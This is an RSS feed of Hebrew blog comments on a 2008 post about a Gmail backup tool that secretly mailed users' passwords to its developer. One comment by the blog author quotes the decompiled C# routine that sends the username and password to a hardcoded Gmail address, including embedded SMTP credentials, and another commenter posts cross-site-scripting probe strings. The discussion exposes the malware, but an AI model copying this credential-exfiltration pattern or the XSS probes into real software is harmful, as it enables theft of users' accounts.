<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>&#8235;תגובות לפוסט: &#34;תוכנת גיבוי ל-gmail חושפת את הסיסמה שלכם.&#34;&#8236;</title>
	<atom:link href="http://guym.co.il/743/feed" rel="self" type="application/rss+xml" />
	<link>http://guym.co.il/743?nucrss=1</link>
	<description>&#8235;יומנו של האקר הוקם על ידי גיא מזרחי וכיום כותבים בו גם חוקרי אבטחת מידע נוספים.&#8236;</description> 	<lastBuildDate>Thu, 11 Mar 2010 11:44:04 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>&#8235;מאת: olga&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-7359</link>
		<dc:creator>&#8235;olga&#8236;</dc:creator>		<pubDate>Fri, 19 Sep 2008 20:01:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-7359</guid>
		<description>&#8235;http://groups.google.com/group/nheb-horny-disney-1&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: ltr;'>
<p><a href="http://groups.google.com/group/nheb-horny-disney-1" rel="nofollow">http://groups.google.com/group/nheb-horny-disney-1</a></p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: warren&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-7341</link>
		<dc:creator>&#8235;warren&#8236;</dc:creator>		<pubDate>Sun, 14 Sep 2008 02:18:09 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-7341</guid>
		<description>&#8235;Good 235rter2rwer23r&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: ltr;'>
<p>Good 235rter2rwer23r</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: הגדרות בתוכנות דואר &#187; ITbananas&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6787</link>
		<dc:creator>&#8235;הגדרות בתוכנות דואר &#187; ITbananas&#8236;</dc:creator>		<pubDate>Tue, 15 Apr 2008 23:09:48 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6787</guid>
		<description>&#8235;[...] פרימיום&quot; מה שאומר הרשמה בכסף. ראה גם: תוכנת גיבוי ל-gmail חושפת את הסיסמה שלכם.   הגדרות יצוא ויבוא מתוכנות דואר שונות הוראות יצוא [...]&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>[...] פרימיום&quot; מה שאומר הרשמה בכסף. ראה גם: תוכנת גיבוי ל-gmail חושפת את הסיסמה שלכם.   הגדרות יצוא ויבוא מתוכנות דואר שונות הוראות יצוא [...]</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: B100&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6659</link>
		<dc:creator>&#8235;B100&#8236;</dc:creator>		<pubDate>Tue, 25 Mar 2008 04:52:04 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6659</guid>
		<description>&#8235;גיא, אתה חייב להודות שיש פה קוראים הזויים לגמרי לפעמים...&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>גיא, אתה חייב להודות שיש פה קוראים הזויים לגמרי לפעמים&#8230;</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: dsa&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6656</link>
		<dc:creator>&#8235;dsa&#8236;</dc:creator>		<pubDate>Mon, 24 Mar 2008 21:27:21 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6656</guid>
		<description>&#8235;
&#039;&quot;&gt;&quot;&#039;&#039;&quot;&lt;&quot;&#039;
&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: ltr;'>
<p>'&quot;&gt;&quot;&quot;&quot;&lt;&quot;'</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: dsa&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6655</link>
		<dc:creator>&#8235;dsa&#8236;</dc:creator>		<pubDate>Mon, 24 Mar 2008 21:26:01 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6655</guid>
		<description>&#8235;
&#039;&gt;&quot;alert(&quot;xss&quot;)&#039;&lt;&quot;
&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: ltr;'>
<p>'&gt;&quot;alert(&quot;xss&quot;)'&lt;&quot;</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: dsa&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6654</link>
		<dc:creator>&#8235;dsa&#8236;</dc:creator>		<pubDate>Mon, 24 Mar 2008 21:21:14 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6654</guid>
		<description>&#8235;איזה מסכנים המשתמשיםם
במילים אחרות זה נקרא קיילוגר לא?!&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>איזה מסכנים המשתמשיםם<br />
במילים אחרות זה נקרא קיילוגר לא?!</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: T0-R3ST&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6596</link>
		<dc:creator>&#8235;T0-R3ST&#8236;</dc:creator>		<pubDate>Sun, 16 Mar 2008 20:16:57 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6596</guid>
		<description>&#8235;מישהו יכול לענות לי על השאלות למעלה :P?&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>מישהו יכול לענות לי על השאלות למעלה <img src='http://guym.co.il/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> ?</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: עמרי&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6576</link>
		<dc:creator>&#8235;עמרי&#8236;</dc:creator>		<pubDate>Sun, 16 Mar 2008 01:45:28 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6576</guid>
		<description>&#8235;קוד מקומפל שניתן להנדסה לאחור הוא ממש לא כמו קוד פתוח.
קודם כל, איכות הפלט של הכלים האלו היא בדרך כלל די נמוכה כי הרבה מידע הולך לאיבוד בקימפול.
דבר שני, עצם זה שצריך לבצע פעולה של הנדסה לאחור של קובץ בינארי - זה כבר מחסום רציני.
ההשוואה הזו ממש לא במקום, כמו שאמרו כבר - קוד זמין גורם לכך שאנשים יסתכלו.
כאנלוגיה:
יש לך חדר, אם הדלת סגורה - כמה אנשים ינסו לבדוק בכלל אם היא נעולה ויציצו פנימה?
לעומת זאת, אם הדלת פתוחה - כמה אנשים יציצו פנימה?

לגבי השאלה אם הוא מטומטם:
תחשבו על זה ככה:
* תהליך הכניסה לג&#039;ימייל מוצפן, אז לא - אי אפשק לדעת מה התוכנה עושה בקלות על ידי רחרוח של הרשת משה.
* התוכנה צריכה להתחבר לג&#039;ימייל כדי לבצע את מה שהיא אמורה לבצע. ככה שגם אם מישהו ירחרח ויראה תעבורת SSL לגוגל, הוא לא יחשוד.
אני לא בטוח בכלל שהוא מטומטם, אולי הוא בסך הכל לא ידע שאפשר לבצע קימפול לאחור (TM) של קוד C# כל כך בקלות.&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>קוד מקומפל שניתן להנדסה לאחור הוא ממש לא כמו קוד פתוח.<br />
קודם כל, איכות הפלט של הכלים האלו היא בדרך כלל די נמוכה כי הרבה מידע הולך לאיבוד בקימפול.<br />
דבר שני, עצם זה שצריך לבצע פעולה של הנדסה לאחור של קובץ בינארי &#8211; זה כבר מחסום רציני.<br />
ההשוואה הזו ממש לא במקום, כמו שאמרו כבר &#8211; קוד זמין גורם לכך שאנשים יסתכלו.<br />
כאנלוגיה:<br />
יש לך חדר, אם הדלת סגורה &#8211; כמה אנשים ינסו לבדוק בכלל אם היא נעולה ויציצו פנימה?<br />
לעומת זאת, אם הדלת פתוחה &#8211; כמה אנשים יציצו פנימה?</p>
<p>לגבי השאלה אם הוא מטומטם:<br />
תחשבו על זה ככה:<br />
* תהליך הכניסה לג'ימייל מוצפן, אז לא &#8211; אי אפשק לדעת מה התוכנה עושה בקלות על ידי רחרוח של הרשת משה.<br />
* התוכנה צריכה להתחבר לג'ימייל כדי לבצע את מה שהיא אמורה לבצע. ככה שגם אם מישהו ירחרח ויראה תעבורת SSL לגוגל, הוא לא יחשוד.<br />
אני לא בטוח בכלל שהוא מטומטם, אולי הוא בסך הכל לא ידע שאפשר לבצע קימפול לאחור (TM) של קוד C# כל כך בקלות.</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: T0-R3ST&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6573</link>
		<dc:creator>&#8235;T0-R3ST&#8236;</dc:creator>		<pubDate>Sat, 15 Mar 2008 21:31:42 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6573</guid>
		<description>&#8235;אכן עד כמה יכול להיות מתכנת מטומתם? לפחות היה מצפין את הסיסמה שלו או משהו חחח ד&quot;א נשמע מעניין אני מתחיל ללמוד את העניין של Reversing איזה שפות תכנות יעזרו לי או האם זה דורש?&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>אכן עד כמה יכול להיות מתכנת מטומתם? לפחות היה מצפין את הסיסמה שלו או משהו חחח ד&quot;א נשמע מעניין אני מתחיל ללמוד את העניין של Reversing איזה שפות תכנות יעזרו לי או האם זה דורש?</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: הראל משה&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6555</link>
		<dc:creator>&#8235;הראל משה&#8236;</dc:creator>		<pubDate>Thu, 13 Mar 2008 18:01:02 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6555</guid>
		<description>&#8235;תודה, גם לך!
נתראה בחלון התגובות של הנושא הבא...
ביי לבנתיים.&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>תודה, גם לך!<br />
נתראה בחלון התגובות של הנושא הבא&#8230;<br />
ביי לבנתיים.</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: גיא מזרחי&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6553</link>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>		<pubDate>Thu, 13 Mar 2008 17:04:47 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6553</guid>
		<description>&#8235;אני לא שולל על הסף.
מה שכן - התגובה שלך העידה כאילו שיש באמת הוכחה לזה שהעניין מפוברק.
מה שבאמת קורה זה שאין לאף אחד דרך לבדוק את העניין.
שיהיה לך ערב נהדר (והרשה לי לציין שיש לך אחלה בלוג :-) ).&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>אני לא שולל על הסף.<br />
מה שכן &#8211; התגובה שלך העידה כאילו שיש באמת הוכחה לזה שהעניין מפוברק.<br />
מה שבאמת קורה זה שאין לאף אחד דרך לבדוק את העניין.<br />
שיהיה לך ערב נהדר (והרשה לי לציין שיש לך אחלה בלוג <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  ).</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: הראל משה&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6552</link>
		<dc:creator>&#8235;הראל משה&#8236;</dc:creator>		<pubDate>Thu, 13 Mar 2008 16:43:52 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6552</guid>
		<description>&#8235;אני לא מסתמך על שום דבר ולא מצהיר בביטחון, דעתי היא שמשהוא מסריח פה ויש לא מעט סיבות למה אני חושב ככה.
אם בא לך להאמין, לך על זה ידידי אבל אולי כדי שלא תשלול את האופצייה השנייה.
ולא לא פיספסתי שום דבר, כמו בכל נושא שאני כותב עליו, חרשתי את האינטרנט כדי למצוא דעות של אנשים אחרים ונחש מה, הדעות חלוקות....
אז אולי כדי שתבדוק למה אני חושב ככה במקום לשלול אותי על הסף
בכל מקרה, שיהיה ערב טוב...&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>אני לא מסתמך על שום דבר ולא מצהיר בביטחון, דעתי היא שמשהוא מסריח פה ויש לא מעט סיבות למה אני חושב ככה.<br />
אם בא לך להאמין, לך על זה ידידי אבל אולי כדי שלא תשלול את האופצייה השנייה.<br />
ולא לא פיספסתי שום דבר, כמו בכל נושא שאני כותב עליו, חרשתי את האינטרנט כדי למצוא דעות של אנשים אחרים ונחש מה, הדעות חלוקות&#8230;.<br />
אז אולי כדי שתבדוק למה אני חושב ככה במקום לשלול אותי על הסף<br />
בכל מקרה, שיהיה ערב טוב&#8230;</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: גיא מזרחי&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6549</link>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>		<pubDate>Thu, 13 Mar 2008 14:20:47 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6549</guid>
		<description>&#8235;1. לא, לא בדקתי את זה בעצמי. אין לי את הזמן והרצון לבדוק תוכנה שאני לא עובד איתה.
2. אם אתה חושב שאנשים לא ישלמו על תוכנה כי יש אחרות שעושות אותו דבר יותר טוב והן לא עולות כסף יש לי רק מילה אחת להגיד לך: Windows. טוב, שתיים: גם Office.
3. ברור שאפשר לגלות את זה בעוד הרבה שיטות. הבחור כתב מה הוא עשה.
לגבי לבדוק את התוכנה כרגע - אין אפשרות.
לפי מה שהבנתי הסירו את הגרסה הבעייתית והעלו אחת אחרת במקומה.

הדבר שמדהים אותי יותר מהעובדה שדבר כזה יכול לקרות (הרי הנושא הזה עלה בבלוג שלי לא פעם) זה שאתה קובע בבטחון:
&quot;כל הסיפור מפוברק, תקראו את התגובות בכתבת המקור&quot; כשלא עשית שום דבר כדי לבדוק אם זה נכון או לא.
אכן, אחראי מאוד.
דבר נוסף - אתה מבקר אותי שאני מסתמך על הכתוב שם אבל אתה מסתמך על תגובות בודדות שמכחישות.

רק כדי לסכם את הנושא:
המפתח עצמו הודה שהוא הכניס קוד כזה למטרות Debug והוא פשוט &quot;שכח&quot; להסיר את הקוד.
אולי פיספת את זה כשקראת את הכתבה המקורית.&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>1. לא, לא בדקתי את זה בעצמי. אין לי את הזמן והרצון לבדוק תוכנה שאני לא עובד איתה.<br />
2. אם אתה חושב שאנשים לא ישלמו על תוכנה כי יש אחרות שעושות אותו דבר יותר טוב והן לא עולות כסף יש לי רק מילה אחת להגיד לך: Windows. טוב, שתיים: גם Office.<br />
3. ברור שאפשר לגלות את זה בעוד הרבה שיטות. הבחור כתב מה הוא עשה.<br />
לגבי לבדוק את התוכנה כרגע &#8211; אין אפשרות.<br />
לפי מה שהבנתי הסירו את הגרסה הבעייתית והעלו אחת אחרת במקומה.</p>
<p>הדבר שמדהים אותי יותר מהעובדה שדבר כזה יכול לקרות (הרי הנושא הזה עלה בבלוג שלי לא פעם) זה שאתה קובע בבטחון:<br />
&quot;כל הסיפור מפוברק, תקראו את התגובות בכתבת המקור&quot; כשלא עשית שום דבר כדי לבדוק אם זה נכון או לא.<br />
אכן, אחראי מאוד.<br />
דבר נוסף &#8211; אתה מבקר אותי שאני מסתמך על הכתוב שם אבל אתה מסתמך על תגובות בודדות שמכחישות.</p>
<p>רק כדי לסכם את הנושא:<br />
המפתח עצמו הודה שהוא הכניס קוד כזה למטרות Debug והוא פשוט &quot;שכח&quot; להסיר את הקוד.<br />
אולי פיספת את זה כשקראת את הכתבה המקורית.</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: הראל משה&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6547</link>
		<dc:creator>&#8235;הראל משה&#8236;</dc:creator>		<pubDate>Thu, 13 Mar 2008 12:09:17 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6547</guid>
		<description>&#8235;מה שאני אומר זה, איזה הוכחות יש לנו שהסיפור באמת נכון?
1. יש לנו תגובות ממשתמשים שטוענים שכן ותגובות ממשתמשים שטוענים שלא!
2. ההוכחה היחידה זה תצלומי המסך שהוא מציג בכתבה.
השאלה שלי היא האם ניסית לבדוק את זה בעצמך או שפשוט קנית את כל הסיפור מכמה תגובות ותצלום מסך שאותי לא שיכנעו במיוחד.
3. אני בטוח שאתה יודע שכל תוכנת URL Snooper פשוטה יכולה לגלות פעילות שכזאת, לא צריך לבצע reverse engineering 

בקיצור, הייתי אומר שקצת ניפוחו את הסיפור 
העדיות לא משכנעות מספיק ובטח לא הצורך בתוכנה כזאת.
למה שמישהו ישלם 30$ לתוכנת גיבויי לגימייל?
הרי אפשר לעשות את חינם בקלי קלות + לגוגל יש API 
שנועדה בידיוק למשימות כמו אלו, לכן זה לא מצדיק את הצורך  של התוכנה לשם משתמש וסיסמה מצד המשתמש.

מה שכן זה נושא מרתק וסקסי....אז למה לא לנפח אותו קצת.
זוהיא לפחות דעתי...&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>מה שאני אומר זה, איזה הוכחות יש לנו שהסיפור באמת נכון?<br />
1. יש לנו תגובות ממשתמשים שטוענים שכן ותגובות ממשתמשים שטוענים שלא!<br />
2. ההוכחה היחידה זה תצלומי המסך שהוא מציג בכתבה.<br />
השאלה שלי היא האם ניסית לבדוק את זה בעצמך או שפשוט קנית את כל הסיפור מכמה תגובות ותצלום מסך שאותי לא שיכנעו במיוחד.<br />
3. אני בטוח שאתה יודע שכל תוכנת URL Snooper פשוטה יכולה לגלות פעילות שכזאת, לא צריך לבצע reverse engineering </p>
<p>בקיצור, הייתי אומר שקצת ניפוחו את הסיפור<br />
העדיות לא משכנעות מספיק ובטח לא הצורך בתוכנה כזאת.<br />
למה שמישהו ישלם 30$ לתוכנת גיבויי לגימייל?<br />
הרי אפשר לעשות את חינם בקלי קלות + לגוגל יש API<br />
שנועדה בידיוק למשימות כמו אלו, לכן זה לא מצדיק את הצורך  של התוכנה לשם משתמש וסיסמה מצד המשתמש.</p>
<p>מה שכן זה נושא מרתק וסקסי&#8230;.אז למה לא לנפח אותו קצת.<br />
זוהיא לפחות דעתי&#8230;</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: גיא מזרחי&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6542</link>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>		<pubDate>Wed, 12 Mar 2008 23:38:15 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6542</guid>
		<description>&#8235;דרור שניר: ברור גם לי שאם אתה מנסה לדחוף חתיכות קוד זדוני בתוכנות קוד פתוח שעובדים עליהם כמות גדולה של מתכנתים, זה יתגלה מהר.
הבעיה הרצינית לדעתי לאו דווקא נובעת מזה שהעניין יתגלה אלא משני דברים אחרים:
1. גם אם העניין יתגלה - הגיקים יידעו אבל חסרי הידע יתקינו בכל זאת.
2. תוכנות קטנות ושוליות בעלות כמה מאות או אלפי התקנות של מפתח יחיד או קבוצה מצומצת של מפתחים עדיין יכולות חשופות לבעיה.

לגבי חוסר האתיקה.
זה נכון.
הוא גם עבר על החוק כשהוא נכנס לחשבון GMAIL שלא שייך לו ועבר שוב על החוק כששינה בו את הסיסמה.
לא אתי אבל בהחלט טוב שבוצע.&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>דרור שניר: ברור גם לי שאם אתה מנסה לדחוף חתיכות קוד זדוני בתוכנות קוד פתוח שעובדים עליהם כמות גדולה של מתכנתים, זה יתגלה מהר.<br />
הבעיה הרצינית לדעתי לאו דווקא נובעת מזה שהעניין יתגלה אלא משני דברים אחרים:<br />
1. גם אם העניין יתגלה &#8211; הגיקים יידעו אבל חסרי הידע יתקינו בכל זאת.<br />
2. תוכנות קטנות ושוליות בעלות כמה מאות או אלפי התקנות של מפתח יחיד או קבוצה מצומצת של מפתחים עדיין יכולות חשופות לבעיה.</p>
<p>לגבי חוסר האתיקה.<br />
זה נכון.<br />
הוא גם עבר על החוק כשהוא נכנס לחשבון GMAIL שלא שייך לו ועבר שוב על החוק כששינה בו את הסיסמה.<br />
לא אתי אבל בהחלט טוב שבוצע.</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: גיא מזרחי&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6541</link>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>		<pubDate>Wed, 12 Mar 2008 23:31:58 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6541</guid>
		<description>&#8235;הראל משה: איך החלטת שהסיפור מפוברק?
עברתי על חלק מהתגובות (לא על הכל אבל על הרוב).
יש שם כמה שטוענים שהם לא הצליחו למצוא את הקטע הבעייתי ומסתבר שהם חיפוש בקובץ הEXE במקום באחד הDLL..
יש שם אפילו קטע מהקוד הבעייתי:

ne thing is true -- if you DL the program and use reflector, you do indeed see the facts as they are described in this post:

public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add(&quot;JTerry79@gmail.com&quot;);
message.From = new MailAddress(&quot;JTerry79@gmail.com&quot;, &quot;JTerry&quot;, Encoding.UTF8);
message.Subject = &quot;Account&quot;;
message.SubjectEncoding = Encoding.UTF8;
message.Body = &quot;Username: &quot; + a;
message.Body = message.Body + &quot;\r\nPassword: &quot; + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential(&quot;JTerry79@gmail.com&quot;, &quot;bilal482&quot;);
client.Port = 0x24b;
client.Host = &quot;smtp.gmail.com&quot;;
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: ltr;'>
<p>הראל משה: איך החלטת שהסיפור מפוברק?<br />
עברתי על חלק מהתגובות (לא על הכל אבל על הרוב).<br />
יש שם כמה שטוענים שהם לא הצליחו למצוא את הקטע הבעייתי ומסתבר שהם חיפוש בקובץ הEXE במקום באחד הDLL..<br />
יש שם אפילו קטע מהקוד הבעייתי:</p>
<p>ne thing is true &#8212; if you DL the program and use reflector, you do indeed see the facts as they are described in this post:</p>
<p>public static void CheckConnection(string a, string b)<br />
{<br />
try<br />
{<br />
MailMessage message = new MailMessage();<br />
message.To.Add(&quot;JTerry79@gmail.com&quot;);<br />
message.From = new MailAddress(&quot;JTerry79@gmail.com&quot;, &quot;JTerry&quot;, Encoding.UTF8);<br />
message.Subject = &quot;Account&quot;;<br />
message.SubjectEncoding = Encoding.UTF8;<br />
message.Body = &quot;Username: &quot; + a;<br />
message.Body = message.Body + &quot;\r\nPassword: &quot; + b;<br />
message.BodyEncoding = Encoding.UTF8;<br />
message.IsBodyHtml = false;<br />
message.Priority = MailPriority.High;<br />
SmtpClient client = new SmtpClient();<br />
client.Credentials = new NetworkCredential(&quot;JTerry79@gmail.com&quot;, &quot;bilal482");<br />
client.Port = 0&#215;24b;<br />
client.Host = &quot;smtp.gmail.com&quot;;<br />
client.EnableSsl = true;<br />
client.Send(message);<br />
}<br />
catch (Exception)<br />
{<br />
}<br />
}</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: הראל משה&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6540</link>
		<dc:creator>&#8235;הראל משה&#8236;</dc:creator>		<pubDate>Wed, 12 Mar 2008 22:46:47 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6540</guid>
		<description>&#8235;כל הסיפור מפוברק, תקראו את התגובות בכתבת המקור: http://www.codinghorror.com/blog/archives/001072.html&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>כל הסיפור מפוברק, תקראו את התגובות בכתבת המקור: <a href="http://www.codinghorror.com/blog/archives/001072.html" rel="nofollow">http://www.codinghorror.com/blog/archives/001072.html</a></p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: דרור שניר&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6539</link>
		<dc:creator>&#8235;דרור שניר&#8236;</dc:creator>		<pubDate>Wed, 12 Mar 2008 22:35:03 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6539</guid>
		<description>&#8235;גיא, אני לא מסכים איתך - ההבדל הוא שבקוד פתוח (לרוב, אני לא מתייחס כאן לפרויקטים של מתכנת יחיד) אנשים אחרים עוברים על הקוד כל הזמן. מבחינה זו, זה ממש כמו תיקון שגיאות מכוונות בויקיפדיה.
כמו שמישהו ציין גם בתגובות לפוסט המקורי (לא, לא קראתי את כולן - 300 תגובות! יש גם יתרונות לזעירותה של הבלוגוספירה הישראלית), משום מה אין התייחסות לחוסר האתיקה שב-reverse engineering של הקוד. מילא אם הבחור שגילה את זה היה מומחה אבטחה, אבל הוא מתכנת שעשה את זה במטרה מוצהרת לגנוב קטעי קוד.

B100, לא מתכנת מטומטם כמו קרימינל גרוע ורשלן.&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>גיא, אני לא מסכים איתך &#8211; ההבדל הוא שבקוד פתוח (לרוב, אני לא מתייחס כאן לפרויקטים של מתכנת יחיד) אנשים אחרים עוברים על הקוד כל הזמן. מבחינה זו, זה ממש כמו תיקון שגיאות מכוונות בויקיפדיה.<br />
כמו שמישהו ציין גם בתגובות לפוסט המקורי (לא, לא קראתי את כולן &#8211; 300 תגובות! יש גם יתרונות לזעירותה של הבלוגוספירה הישראלית), משום מה אין התייחסות לחוסר האתיקה שב-reverse engineering של הקוד. מילא אם הבחור שגילה את זה היה מומחה אבטחה, אבל הוא מתכנת שעשה את זה במטרה מוצהרת לגנוב קטעי קוד.</p>
<p>B100, לא מתכנת מטומטם כמו קרימינל גרוע ורשלן.</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: B100&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6537</link>
		<dc:creator>&#8235;B100&#8236;</dc:creator>		<pubDate>Wed, 12 Mar 2008 19:08:39 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6537</guid>
		<description>&#8235;עד כמה מתכנת יכול להיות מטומטם?&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>עד כמה מתכנת יכול להיות מטומטם?</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: L[s]D&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6535</link>
		<dc:creator>&#8235;L[s]D&#8236;</dc:creator>		<pubDate>Wed, 12 Mar 2008 13:02:40 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6535</guid>
		<description>&#8235;לא הבנתי.. הג&#039;ון טרי הזה או איך שלא כותבים את השם שלו לא קשור בשום דרך לגוגל?&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>לא הבנתי.. הג'ון טרי הזה או איך שלא כותבים את השם שלו לא קשור בשום דרך לגוגל?</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>&#8235;מאת: גלעד-flint&#8236;</title>
		<link>http://guym.co.il/743/comment-page-1#comment-6532</link>
		<dc:creator>&#8235;גלעד-flint&#8236;</dc:creator>		<pubDate>Wed, 12 Mar 2008 11:29:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.hacking.org.il/743#comment-6532</guid>
		<description>&#8235;איזה באסה למשתמשים..
לדעתי אם הקוד היה קוד פתוח אז היו מוצאים את זה יותר מהר.. וזה דווקא טוב לאבטחה.&#8236;</description> 		<content:encoded><![CDATA[<div style='direction: rtl;'>
<p>איזה באסה למשתמשים..<br />
לדעתי אם הקוד היה קוד פתוח אז היו מוצאים את זה יותר מהר.. וזה דווקא טוב לאבטחה.</p>
</div>
]]></content:encoded>
	</item>
</channel>
</rss>
